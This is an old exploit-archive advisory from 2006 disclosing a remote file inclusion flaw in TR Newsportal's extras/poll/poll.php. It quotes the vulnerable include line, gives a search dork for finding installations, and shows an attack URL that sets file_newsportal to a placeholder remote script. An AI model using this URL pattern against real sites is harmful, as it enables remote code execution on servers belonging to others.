[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : TR Newsportal <= 0.36tr1 (poll.php) Remote File Inclusion Vulnerability
# Published : 2006-05-15
# Author : Kacper
# Previous Title : DeluxeBB <= 1.06 (Attachment mod_mime) Remote Exploit
# Next Title : Squirrelcart <= 2.2.0 (cart_content.php) Remote Inclusion Vulnerability
################ DEVIL TEAM THE BEST POLISH TEAM #################
#TR Newsportal - Remote File Include
#Find by Kacper (Rahim).
#Greetings For ALL DEVIL TEAM members, Special DragonHeart :***
#Contact: kacper1964@yahoo.pl or http://www.devilteam.yum.pl
#dork: "TR Newsportal" brought by TRanx.
##################################################################
extras/poll/poll.php:
[code]
<?
include("$file_newsportal");
$ns=OpenNNTPconnection($server,$port);
flush();
if ($ns != false) {
$headers = readOverview($ns,$group,1,true);
closeNNTPconnection($ns);
}
?>
[/code]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.site.com/[Newsportal_path]/extras/poll/poll.php?file_newsportal=[evil_scripts]
###################################################################
#Elo ;-)
# www.Syue.com [2006-05-15]